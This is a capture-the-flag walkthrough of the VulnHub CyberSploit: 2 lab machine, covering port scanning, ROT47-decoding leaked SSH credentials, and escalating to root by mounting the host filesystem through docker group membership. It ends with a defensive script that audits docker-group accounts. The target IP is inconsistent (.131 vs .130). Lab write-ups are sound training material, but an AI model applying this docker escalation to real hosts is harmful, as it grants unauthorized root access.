VulnHub target machine - CyberSploit: 2

1. Find the target machine's IP: 192.168.0.131

nmap -sn 192.168.0.0/24

2. Scan the target machine's ports

root@kali:~# nmap -p- -A 192.168.0.130
Starting Nmap 7.80 ( https://nmap.org ) 
Nmap scan report for 192.168.0.130
Host is up (0.00070s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
|   2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_  256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Hello Pentester!
MAC Address: 08:00:27:F1:D7:A0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.70 ms 192.168.0.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.91 seconds

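3. Visit port 80. Among several normal-looking usernames and passwords there is one username/password pair that does not look normal.

Take that pair for decoding. The guess is that it needs a shift, and that every character has to be shifted along with the rest; an online ROT47 site decodes it successfully.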

D92:=6?5C2	4J36CDA=@:E`
shailendra	cybersploit1

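4. Log in remotely over SSH with the username and password shailendra/cybersploit1. The home directory contains a hint file, hint.txt, whose content is "docker", an old friend. Running id straight away to check the user's groups shows that the user is indeed in the docker group. First check whether there are any images locally; there are none, so an image has to be pulled over the network again. After that the steps are the same as before: privilege escalation succeeds and the flag is obtained.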

root@kali:~# ssh shailendra@192.168.0.131
shailendra@192.168.0.131's password: cybersploit1 (not shown while typing)
There were 3 failed login attempts since the last successful login.
Last login: Wed Jul 15 12:32:09 2020
[shailendra@localhost ~]$ ls
hint.txt
[shailendra@localhost ~]$ cat hint.txt 
docker
[shailendra@localhost ~]$ id
uid=1001(shailendra) gid=1001(shailendra) groups=1001(shailendra),991(docker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[shailendra@localhost ~]$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
[shailendra@localhost ~]$ docker pull alpine
Using default tag: latest
latest: Pulling from library/alpine
df20fa9351a1: Pull complete 
Digest: sha256:185518070891758909c9f839cf4ca393ee977ac378609f700f60a771a2dfe321
Status: Downloaded newer image for alpine:latest
docker.io/library/alpine:latest
[shailendra@bogon ~]$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
alpine              latest              a24bb4013296        7 weeks ago         5.57MB
[shailendra@bogon ~]$ docker run -v /:/mnt  -it alpine
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # cd /mnt/root/
/mnt/root # ls
anaconda-ks.cfg  flag.txt         get-docker.sh    logs}
/mnt/root # cat flag.txt 
 __    ___   _      __    ___    __   _____  __  
/ /`  / / \ | |\ | / /`_ | |_)  / /\   | |  ( (` 
\_\_, \_\_/ |_| \| \_\_/ |_| \ /_/--\  |_|  _)_) 

 Pwned CyberSploit2 POC

share it with me twitter@cybersploit1

              Thanks ! 
/mnt/root # 
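
The escalation in step 4 works because the Docker daemon runs as root and will bind-mount any host path for a member of the docker group, so membership in that group is root-equivalent. As an added example (not part of the original post), a shell function that audits which accounts are in that position; the sample files and the account "builder" are constructed for illustration.

```shell
#!/bin/sh
# Added example: list accounts that are root-equivalent through docker group
# membership, as with shailendra (groups=...,991(docker)) in the session above.

# docker_group_members GROUP_FILE PASSWD_FILE [GROUP_NAME]
# Prints one non-root account per line, sorted and de-duplicated.
docker_group_members() {
    group_file=$1
    passwd_file=$2
    group_name=${3:-docker}

    # Numeric GID of the group; empty when the group does not exist.
    gid=$(awk -F: -v g="$group_name" '$1 == g { print $3; exit }' "$group_file")
    [ -n "$gid" ] || return 0

    {
        # Supplementary members: 4th field of the group line, comma separated.
        awk -F: -v g="$group_name" '$1 == g {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
        }' "$group_file"
        # Accounts whose primary GID is the group; these never appear in the
        # group line, so reading the group file alone misses them.
        awk -F: -v gid="$gid" '$4 == gid { print $1 }' "$passwd_file"
    } | sort -u | grep -v '^root$' || true
}

# Constructed sample data (not taken from the target): the UID/GID values for
# shailendra and docker follow the `id` output above; "builder" is hypothetical.
sample_audit() {
    dir=$(mktemp -d)
    cat > "$dir/group" <<'EOF'
root:x:0:
wheel:x:10:
docker:x:991:shailendra
shailendra:x:1001:
EOF
    cat > "$dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
shailendra:x:1001:1001::/home/shailendra:/bin/bash
builder:x:1002:991::/home/builder:/bin/bash
EOF
    docker_group_members "$dir/group" "$dir/passwd"
    rm -rf "$dir"
}

sample_audit
```

On a real host, pass /etc/group and /etc/passwd as the two arguments; every account it prints should be treated as having root on that machine.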